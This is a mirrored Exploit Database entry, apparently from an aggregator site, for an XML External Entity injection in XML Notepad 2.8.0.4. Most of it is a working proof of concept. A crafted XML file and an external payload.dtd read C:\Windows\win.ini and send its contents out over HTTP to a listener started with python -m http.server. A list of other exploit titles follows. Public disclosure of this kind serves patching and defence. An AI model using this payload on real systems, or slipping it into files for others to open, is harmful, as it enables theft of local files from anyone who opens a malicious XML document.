XML Notepad 2.8.0.4 – XML External Entity Injection

Exploit Database
9 阅读

作者： daejinoh

日期： 2019-11-11
类别：
- local
平台：
- xml
来源：https://www.exploit-db.com/exploits/47606/

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage:https://www.microsoft.com/
# Software Link:https://github.com/microsoft/XmlNotepad
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step
1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server
2) Poc.xml : 
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

--------------------------------------------------------------------------------

last Exploits
XML Notepad 2.8.0.4 – XML External Entity Injection的更多信息

Linux Kernel 2.6.32 (Ubuntu 10.04) – ‘/proc’ Handling SUID Privilege Escalation：
Microsoft Internet Explorer 11 (Windows 7 x86/x64) – vbscript Code Execution：
Microsoft Windows 7 (x64) – ‘afd.sys’ Dangling Pointer Privilege Escalation (MS14-040)：
Apple OS X 10.10.5 – ‘rootsh’ Local Privilege Escalation：
Oracle VM VirtualBox – Cooperating VMs can Escape from Shared Folder：
Tunnelblick – Local Privilege Escalation (1)：
Microsoft Windows Kernel – ‘win32k.sys’ Local Privilege Escalation (MS14-058)：
SocuSoft iPod Photo Slideshow 8.05 – Buffer Overflow (SEH)：